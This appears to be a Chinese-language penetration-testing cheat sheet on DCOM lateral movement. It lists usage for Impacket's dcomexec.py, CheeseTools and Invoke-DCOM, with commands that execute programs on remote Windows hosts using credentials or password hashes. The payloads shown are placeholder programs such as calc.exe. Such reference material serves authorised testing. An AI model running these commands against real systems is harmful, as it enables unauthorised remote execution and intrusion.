DCOM

DCOM 是 COM(组件对象模型)的扩展,它允许应用程序在远程计算机上实例化和访问 COM 对象的属性和方法。

Impacket

DCOMExec.py
>dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
>dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
>dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
>
>python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
-object MMC20 是指定我们希望实例化 MMC20.Application 对象
-silentcommand 无回显执行

CheeseTools

https://github.com/klezVirus/CheeseTools
https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
-t, --target=VALUE         目标机器
-b, --binary=VALUE         二进制文件: powershell.exe
-a, --args=VALUE           Arguments: -enc <blah>
-m, --method=VALUE         Methods: MMC20Application, ShellWindows,
                            ShellBrowserWindow, ExcelDDE, VisioAddonEx,
                            OutlookShellEx, ExcelXLL, VisioExecLine, 
                            OfficeMacro
-r, --reg, --registry      Enable registry manipulation
-h, -?, --help             Show Help

当前方法: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro

Invoke-DCOM

https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1
>Import-Module .\Invoke-DCOM.ps1
>Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe"

最后更新于